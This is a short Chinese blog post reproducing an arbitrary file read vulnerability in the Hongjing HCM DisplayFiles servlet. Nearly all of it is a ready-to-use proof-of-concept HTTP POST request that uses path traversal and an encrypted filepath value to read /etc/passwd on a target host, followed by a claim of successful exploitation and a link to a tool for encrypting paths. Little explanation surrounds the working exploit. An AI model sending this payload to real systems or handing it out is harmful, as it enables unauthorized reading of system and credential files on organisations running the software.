Always keep a|

都吃泡芙

园龄:9个月粉丝:4关注:4

宏景HCM DisplayFiles任意文件读取

漏洞复现:

POC:

POST /templates/attestation/../../servlet/DisplayFiles HTTP/1.1
Host: ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Content-Length: 63

filepath=RNcrjWtNfJnkUMbX1UB6VAPAATTP3HJDPAATTPPAATTP3HJDPAATTP

漏洞利用成功
image

其中filepath的加密为读取/etc/passwd:

filepath=RNcrjWtNfJnkUMbX1UB6VAPAATTP3HJDPAATTPPAATTP3HJDPAATTP

工具地址:https://github.com/wafinfo/DecryptTools
image

本文作者:pa0fu

本文链接:https://www.cnblogs.com/pa0fu/p/18248137

版权声明:本作品采用知识共享署名-非商业性使用-禁止演绎 2.5 中国大陆许可协议进行许可。

posted @   都吃泡芙  阅读(70)  评论(0编辑  收藏  举报
//雪花飘落效果 //雪花飘落效果
点击右上角即可分享
微信分享提示
评论
收藏
关注
推荐
深色
回顶
收起